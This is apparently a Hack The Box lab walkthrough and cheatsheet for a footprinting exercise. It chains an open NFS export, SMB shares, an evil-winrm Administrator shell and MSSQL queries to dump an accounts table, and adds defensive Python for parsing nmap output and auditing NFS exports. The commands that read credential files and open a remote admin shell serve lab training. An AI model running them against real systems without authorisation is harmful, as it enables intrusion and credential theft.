🛡️ Methodology Checklist
- Full port scan + service version detection
- Enumerate all discovered services with protocol-specific tools
- Try null/anonymous auth on each service
- SNMP enumeration for credential or config leakage
- IPMI RAKP message hash capture and crack
- Check NFS exports for sensitive data
- Correlate credentials across services (reuse)
- Document attack path from initial access to objective
🎯 Operational Context
Think Dumber First: Hard lab means nothing is given — every service requires active enumeration and creative thinking. Start with a comprehensive port scan on ALL ports (TCP + UDP). The credential for one service is frequently the key to another. Document every finding immediately — the chain will be long.
When you land here: Hard Footprinting Lab. Full port scan first. Enumerate every service found. Look for credential reuse across services. Identify the chain: initial access → privilege escalation → flag capture. The path is non-linear — dead ends are part of the process.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `nmap -p- --min-rate=1000 -T4 [TARGET_IP] -oN all_ports.nmap` | Fast full port scan |
| `ports=$(grep "open" all_ports.nmap \| cut -d "/" -f 1 \| tr "\n" ",")` | Parse open ports into variable |
| `sudo nmap -sV -sC -p $ports [TARGET_IP] -oA detailed_scan` | Detailed service scan on open ports |
| `showmount -e [TARGET_IP]` | List NFS exports |
| `sudo mount -t nfs [TARGET_IP]:/TechSupport ./target_share -o nolock` | Mount NFS share |
| `cat ./target_share/userpass.txt` | Read credentials from mounted share |
| `smbclient -L [TARGET_IP] -U alex` | List SMB shares with found credentials |
| `smbclient //[TARGET_IP]/devshare -U alex` | Connect to non-standard share |
| `get important.txt` | Download file from SMB |
| `evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]'` | WinRM shell as Administrator |
| `sqlcmd -S . -E -Q "SELECT name FROM master.dbo.sysdatabases"` | List MSSQL databases (trusted auth) |
| `sqlcmd -S . -E -Q "SELECT name FROM accounts.sys.tables"` | List tables in database |
| `sqlcmd -S . -E -Q "SELECT * FROM accounts.dbo.devsacc"` | Dump table contents |
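The `grep "open" | cut | tr` one-liner in the table does the job on clean output, but it has two rough edges: it leaves a trailing comma in `$ports`, and it matches any line containing "open", including the `# Nmap ... as: nmap --open ...` header line when the scan was run with `--open`. The parser below is an added example (not part of the original cheatsheet) that reads the same `-oN` format properly, keeps only lines in `port/proto  state  service` form, and can optionally include `open|filtered` UDP results such as SNMP on 161. The sample scan output is constructed for this example; the target address and timestamps are placeholders.

```python
import re

# Constructed nmap -oN output (placeholder host and timestamps, not real lab output).
# The header line deliberately contains "--open" to show why a plain grep for "open" misfires.
SAMPLE_NMAP_ON = """\
# Nmap 7.94 scan initiated Thu Jan  1 00:00:00 2024 as: nmap -p- --open --min-rate=1000 -T4 -oN all_ports.nmap 10.0.0.10
Nmap scan report for 10.0.0.10
Host is up (0.015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE         SERVICE
111/tcp  open          rpcbind
445/tcp  open          microsoft-ds
2049/tcp open          nfs
5985/tcp open          wsman
161/udp  open|filtered snmp

# Nmap done at Thu Jan  1 00:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# Only real port lines look like "<port>/<proto>  <state>  <service>" at the start of a line.
_PORT_LINE = re.compile(r'^(\d{1,5})/(tcp|udp)\s+(open(?:\|filtered)?)\s+(\S+)', re.M)


def open_ports(text, include_filtered=False):
    """Return [(port, proto, service)] for ports nmap reports as open.

    'open|filtered' (typical for UDP) is excluded unless include_filtered is set,
    so the caller decides whether unconfirmed UDP services count.
    """
    results = []
    for m in _PORT_LINE.finditer(text):
        port, proto, state, service = m.groups()
        if state != 'open' and not include_filtered:
            continue
        results.append((int(port), proto, service))
    return results


def ports_arg(text, proto='tcp'):
    """Comma-separated port list for a follow-up 'nmap -p', without a trailing comma."""
    return ','.join(str(p) for p, pr, _ in open_ports(text) if pr == proto)


if __name__ == '__main__':
    for port, proto, service in open_ports(SAMPLE_NMAP_ON, include_filtered=True):
        print(f'{port}/{proto:<3} {service}')
    print('-p', ports_arg(SAMPLE_NMAP_ON))
```

Run against a real `all_ports.nmap`, `ports_arg()` gives the exact value the table's `$ports` variable is meant to hold; the same parser is also handy on the defensive side for diffing an authorised baseline scan against a fresh one to spot newly exposed services.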
🔬 Deep Dive & Workflow
Attack Chain: NFS (unauthenticated read) → SMB (authenticated share) → WinRM (shell) → MSSQL (data extraction)
Phase 1: Initial Recon
- Fast all-ports TCP scan + UDP scan for 161 (SNMP)
- Key findings: Port 111/2049 (NFS), 445 (SMB), 5985 (WinRM)
Phase 2: NFS Enumeration (Initial Access)
- `showmount -e [TARGET_IP]` → find `/TechSupport` (everyone)
- Mount share → find `userpass.txt` → credentials `alex / [PASS]`
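The whole chain starts with an NFS export that is readable by everyone and happens to hold a credentials file. On the defending side the equivalent check is an audit of `/etc/exports` for wildcard clients, `rw` to the world and `no_root_squash`. The script below is an added example, not part of the original walkthrough; the exports file it parses is constructed for this example, and the `/TechSupport` entry is only there to mirror the lab's finding. It also handles the classic `/path host (rw)` mistake, where the space before `(rw)` makes the options apply to every host rather than to `host`.

```python
import re

# Constructed /etc/exports sample (not taken from the lab host).
# "/data 10.0.0.5 (rw)" is the well-known typo: the space means "(rw)" applies to "*", not to 10.0.0.5.
SAMPLE_EXPORTS = """\
# NFS exports - constructed sample
/TechSupport *(rw,no_root_squash,sync)
/srv/backups 10.0.0.0/24(ro,root_squash,sync)
/home        *(ro,sync)
/data        10.0.0.5 (rw)
"""

# One client spec: optional client (host, netgroup, wildcard or CIDR) plus optional "(options)".
_SPEC = re.compile(r'^([^\s(]+)?(?:\((.*?)\))?$')


def parse_exports(text):
    """Return a list of {'path', 'client', 'options'} dicts, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:]
        if not specs:
            specs = ['*']                         # no client list: exported to everyone with defaults
        for spec in specs:
            m = _SPEC.match(spec)
            if not m:
                continue
            client = m.group(1) or '*'            # bare "(opts)" token applies to the wildcard client
            opts = [o for o in (m.group(2) or '').split(',') if o]
            entries.append({'path': path, 'client': client, 'options': opts})
    return entries


def audit_exports(text):
    """Return [(path, client, [issue, ...])] for every export spec with a risky setting."""
    findings = []
    for e in parse_exports(text):
        opts = set(e['options'])
        issues = []
        if e['client'] == '*':
            issues.append('wildcard-client')      # any host that can reach port 2049 may mount it
        if e['client'] == '*' and 'rw' in opts:
            issues.append('rw-to-wildcard')       # world-writable, not just world-readable
        if 'no_root_squash' in opts:
            issues.append('no_root_squash')       # remote root keeps uid 0 on the export
        if issues:
            findings.append((e['path'], e['client'], issues))
    return findings


if __name__ == '__main__':
    for path, client, issues in audit_exports(SAMPLE_EXPORTS):
        print(f'{path:<14} {client:<12} {", ".join(issues)}')
```

Run it with `open('/etc/exports').read()` on an NFS server to get the same view an attacker gets from `showmount -e`, before they do. Note that a wildcard `ro` export such as `/home` above is still a finding: the lab's credential leak came from a read, not a write.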
Phase 3: SMB Pivoting
- `smbclient -L [TARGET_IP] -U alex` → find non-standard `devshare`
- Connect to `devshare` → download `important.txt` → `sa:[PASS]` (SQL SA + Windows Administrator password)
Phase 4: WinRM Shell
- `evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]'`
- Verify: `whoami` → `winmedium\administrator`
Phase 5: MSSQL Data Extraction
- `sqlcmd -S . -E -Q "SELECT name FROM master.dbo.sysdatabases"` → find `accounts` database
- `sqlcmd -S . -E -Q "SELECT name FROM accounts.sys.tables"` → find `devsacc` table
- `sqlcmd -S . -E -Q "SELECT * FROM accounts.dbo.devsacc"` → find `HTB` user entry
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Service found but no obvious attack path | Service is hardened or requires specific credentials | Continue enumerating other services; look for credential hints in other service outputs |
| Credentials found but not working | Wrong service or wrong format | Try credentials against all open services (FTP, SSH, SMB, web, DB); check case sensitivity and domain format |
| Lab seems complete but no flag | Missed a service or enumeration step | Run a fresh nmap full-port scan including UDP; re-examine all discovered files and configs |
| Network connectivity unstable to lab | HTB VPN issues | Reconnect VPN; restart OpenVPN; try different HTB VPN server region |
| Pivoting required but no pivot tools available | Tool not on attack box | Use SSH dynamic port forwarding (ssh -D 9050) or Chisel if available; check /tmp for pre-installed tools |
📝 Reporting Trigger
Finding Title: (Lab walkthrough — document attack chain for reporting practice: Initial Access method, Lateral Movement steps, Privilege Escalation technique, and Objective completion. This forms the narrative attack chain section of your pentest report.)